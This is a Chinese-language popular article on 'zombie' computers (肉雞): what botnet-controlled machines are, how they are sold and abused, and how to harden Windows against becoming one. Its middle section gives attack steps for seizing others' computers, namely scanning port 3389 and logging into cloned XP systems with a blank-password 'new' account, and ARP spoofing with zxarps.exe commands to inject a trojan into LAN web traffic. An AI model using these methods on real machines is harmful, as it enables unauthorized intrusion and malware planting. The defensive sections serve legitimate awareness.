肉雞不是雞！它是……

此雞非彼雞……

作者：Sam 編輯：曼曼掏糞工

什麼是肉雞？

肉雞也稱傀儡機，是指可以被黑客遠程控制的機器。比如用"灰鴿子"等誘導客戶點擊或者電腦被黑客攻破或用戶電腦有漏洞被種植了木馬，黑客可以隨意操縱它並利用它做任何事情。登陸肉雞，必須知道3個參數：遠程電腦的IP、用戶名、密碼。說到肉雞，就要講到遠程控制。遠程控制軟體例如灰鴿子、上興等。

肉雞一般被黑客以0.08、0.1元到30元不等價格出售。

你的電腦成為肉雞的危害

1.盜竊虛擬財產

虛擬財產有：網路遊戲ID帳號裝備、QQ號里的Q幣、聯眾的虛擬榮譽值等等。虛擬財產，是可以兌現為真實貨幣的，多少不限，積累起來就是財富。

2.盜竊真實財產

真實財產包括：網上銀行，大眾版可以進行小額支付，一旦你的網銀帳號被盜，最多見的就是要為別人的消費買單了。此外，還有網上炒股，證券大盜之類的木馬不少，攻擊者可以輕易獲得網上炒股的帳號，和銀行交易不同的是，攻擊者不能利用偷來的炒股帳號直接獲益，這是由股票交易的特殊性決定的。不然，網上炒股一定會成為股民的噩夢。

相當多的普通電腦用戶不敢使用網上銀行，原因就是不了解該怎樣保護網上銀行的帳號安全。事實上，網上銀行的安全性比網上炒股強很多。正確使用網上銀行，安全性和便利性都是有保障的。

3.盜竊他人的隱私數據

陳冠希事件，相信大家都知道，如果普通人的隱密照片、文檔被發布在互聯網上，後果將會十分嚴重。利用偷來的受害人隱私信息進行詐騙、勒索的案例不少。

還有攻擊者熱衷於遠程控制別人的攝像頭，滿足偷窺他人隱私的邪惡目的。如果偷到受害人電腦上的商業信息，比如財務報表、人事檔案，攻擊者都可以謀取非法利益。

4.非法獲利

你或許認為你的QQ號無足輕重，也沒QQ秀，也沒Q幣。實際上並非如此，你的QQ好友，你的Email聯繫人，手機聯繫人，都是攻擊者的目標，攻擊者可以偽裝成你的身份進行各種不法活動，每個人的人脈關係都是有商業價值的。

最常見的例子就是12590利用偷來的QQ號群發垃圾消息騙錢，還有MSN病毒，自動給你的聯繫人發消息騙取非法利益。

5.種植流氓軟體

這種情況下，會影響你的上網體驗，相信所有人都很討厭電腦自動彈出的廣告。攻擊者在控制大量肉雞之後，可以通過強行彈出廣告，從廣告主那裡收穫廣告費，流氓軟體泛濫的原因之一，就是很多企業購買流氓軟體開發者的廣告。

還有的攻擊者，通過肉雞電腦在後台偷偷點擊廣告獲利，當然，受損的就是肉雞電腦了。

6.其它電腦發起攻擊

黑客的任何攻擊行為都可能留下痕迹，為了更好的隱藏自己，必然要經過多次代理的跳轉，肉雞電腦充當了中介和替罪羊。攻擊者為傳播更多的木馬，也許會把你的電腦當做木馬下載站。網速快，機器性能好的電腦被用作代理伺服器的可能性更大。

7.發起DDoS攻擊

DDoS，你可以理解為網路黑幫或網路戰爭，戰爭的發起者是可以獲取收益的，有人會收購這些網路打手。這些網路黑幫成員，也可以直接對目標主機進行攻擊，然後敲詐勒索。「肉雞」電腦，就是這些網路黑幫手裡的一個棋子，DDoS攻擊行為已經是網路毒瘤。

總之，「肉雞」電腦是攻擊者致富的源泉，在攻擊者的圈子裡，「肉雞」電腦就象白菜一樣被賣來賣去。在黑色產業鏈的高端，這些龐大「肉雞」電腦群的控制者構築了一個同樣龐大又黑暗的木馬帝國。

如何讓別人的電腦成為你的肉雞

一般人我是不告訴他的，但是大家肯定很有興趣，我普及其中的兩種辦法(其實一般人也學不會)，切勿用於不法行為!

需要的基礎：

至少會一門編程語言（會用socket HTTP GET POST請求文件讀取操作，字元串判斷 正則等等）

1：掃3389埠抓肉雞

這個方法比較簡單，適合新手朋友。

原理：國內流傳著一種克隆版的XP，安裝後會默認開啟一個賬號為new,密碼為空的賬戶，而且基本上都是默認開放3389服務的，我們就可以利用這一點來抓肉雞。

方法：掃描工具（如S等等）掃一段IP的3389埠，掃完後就直接用3389連接器連接開放3389的機器，也可以把結果保存為文本，用批量生成3389連接的工具生成鏈接，比較方便的，然後輸入賬號new登入，如果別人的電腦前沒人的話你就可以去你的空間下載你傳好的木馬然後安裝。

這種方法只能是XP系統，如果遇到2000或者2003系統就不要試了，除非有輸入法漏洞，不過現在很少了，還有那麼多的3389，幹嘛在它上面浪費時間呢。

這個方法缺點也是大大的，XP只支持單用戶登入，，你再登入上去就會把他擠出去，而且不可以抓國外的肉雞。

2： ARP區域網欺騙掛馬

ARP命令：zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert""

這裡網馬地址就假設為http://www.***.net/那麼命令就是

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99-port 80 -insert ""

接上 3389 伺服器 伺服器必須安裝 winPcap.exe 工具都有打包

然後就執行 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80-insert "" IP自己改

zxarps.exe是免殺的 先安裝WinPcap_4_0.exe 然後運行1.bat的批處理 輸入命令zxarps.exe就可以了

這樣就可以把馬掛上拉如果拿到一台內網機器 整個機房的機器都可以掛上馬

如何防止自己的電腦成為別人的肉雞

1.關閉高危埠

第一步，點擊「開始」菜單/設置/控制面板/管理工具，雙擊打開「本地安全策略」，選中「IP 安全策略，在本地計算機」，在右邊窗格的空白位置右擊滑鼠，彈出快捷菜單，選擇「創建 IP 安全策略」，於是彈出一個嚮導。在嚮導中點擊「下一步」按鈕，為新的安全策略命名；再按「下一步」，則顯示「安全通信請求」畫面，在畫面上把「激活默認相應規則」左邊的鉤去掉，點擊「完成」按鈕就創建了一個新的IP 安全策略。

第二步，右擊該IP安全策略，在「屬性」對話框中，把「使用添加嚮導」左邊的鉤去掉，然後單擊「添加」按鈕添加新的規則，隨後彈出「新規則屬性」對話框，在畫面上點擊「添加」按鈕，彈出IP篩選器列表窗口；在列表中，首先把「使用添加嚮導」左邊的鉤去掉，然後再點擊右邊的「添加」按鈕添加新的篩選器。

第三步，進入「篩選器屬性」對話框，首先看到的是定址，源地址選「任何 IP 地址」，目標地址選「我的 IP 地址」；點擊「協議」選項卡，在「選擇協議類型」的下拉列表中選擇「TCP」，然後在「到此埠」下的文本框中輸入「135」，點擊「確定」按鈕（如左圖），這樣就添加了一個屏蔽 TCP 135（RPC）埠的篩選器，它可以防止外界通過135埠連上你的電腦。

點擊「確定」後回到篩選器列表的對話框，可以看到已經添加了一條策略，重複以上步驟繼續添加 TCP 137、139、445、593 埠和 UDP 135、139、445 埠，為它們建立相應的篩選器。

重複以上步驟添加TCP1025、2745、3127、6129、3389埠的屏蔽策略，建立好上述埠的篩選器，最後點擊「確定」按鈕。

第四步，在「新規則屬性」對話框中，選擇「新 IP篩選器列表」，然後點擊其左邊的圓圈上加一個點，表示已經激活，最後點擊「篩選器操作」選項卡。在「篩選器操作」選項卡中，把「使用添加嚮導」左邊的鉤去掉，點擊「添加」按鈕，添加「阻止」操作（右圖）：然後點擊「確定」按鈕。

第五步,進入「新規則屬性」對話框，點擊「新篩選器操作」，其左邊的圓圈會加了一個點，表示已經激活，點擊「關閉」按鈕，關閉對話框；最後回到「新IP安全策略屬性」對話框，在「新的IP篩選器列表」左邊打鉤，按「確定」按鈕關閉對話框。在「本地安全策略」窗口，用滑鼠右擊新添加的 IP 安全策略，然後選擇「指派」。

重新啟動後，電腦中上述網路埠就被關閉了，病毒和黑客再也不能連上這些埠，從而保護了你的電腦 。

2.經常檢查系統

經常檢查自己計算機上的殺毒軟體，防火牆的目錄，服務，註冊表等相關項。

黑客經常利用用戶對它們的信任將木馬隱藏或植入這些程序。

警惕出現在這些目錄里的系統屬性的DLL。（可能被用來DLL劫持）

警惕出現在磁碟根的pagefile.sys.(該文件本是虛擬頁面交換文件。也可被用來隱藏文件。要檢查系統的頁面文件的盤符是否和它們對應)

3.盜版系統存在風險

如果你的操作系統是其它技術人員安裝，或者有可能是盜版XP，比如電腦裝機商的**版本，蕃茄花園XP，雨木林風XP，龍捲風XP等。這樣的系統，很多是無人值守安裝的。安裝步驟非常簡單，你把光碟放進電腦，出去喝茶，回來就可能發現系統已經安裝完畢。

這樣的系統，最大的缺陷在哪兒呢？再明白不過，這種系統的管理員口令是空的，並且自動登錄。也就是說，任何人都可以嘗試用空口令登錄你的系統，距離對於互聯網來說，根本不是障礙。

4.移動存儲設備

在互聯網發展起來之前，病毒的傳播是依賴於軟磁碟的，其後讓位於網路。公眾越來越頻繁的使用移動存儲設備（移動硬碟、U盤、數碼存儲卡）傳遞文件，這些移動存儲設備成為木馬傳播的重要通道。計算機用戶通常把這樣的病毒稱為U盤病毒或AUTO病毒。意思是插入U盤這個動作，就能讓病毒從一個U盤傳播到 另一台電腦。

5.安全上網

成為肉雞很重要的原因之一是瀏覽不安全的網站，區分什麼網站安全，什麼網站不安全，這對普通用戶來說，是很困難的。並且還存在原來正常的網站被入侵植入木馬的可能性，也有被ARP攻擊之後，訪問任何網頁都下載木馬的風險。

上網下載木馬的機會總是有的，誰都無法避免，只能減輕這種風險。

瀏覽器的安全性需要得到特別關注，瀏覽器和瀏覽器插件的漏洞是黑客們的最愛，flash player漏洞就是插件漏洞，這種漏洞是跨瀏覽器平台的，任何使用flashplayer的場合都可能存在這種風險。

建議大家合理上網、使用正版系統！

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！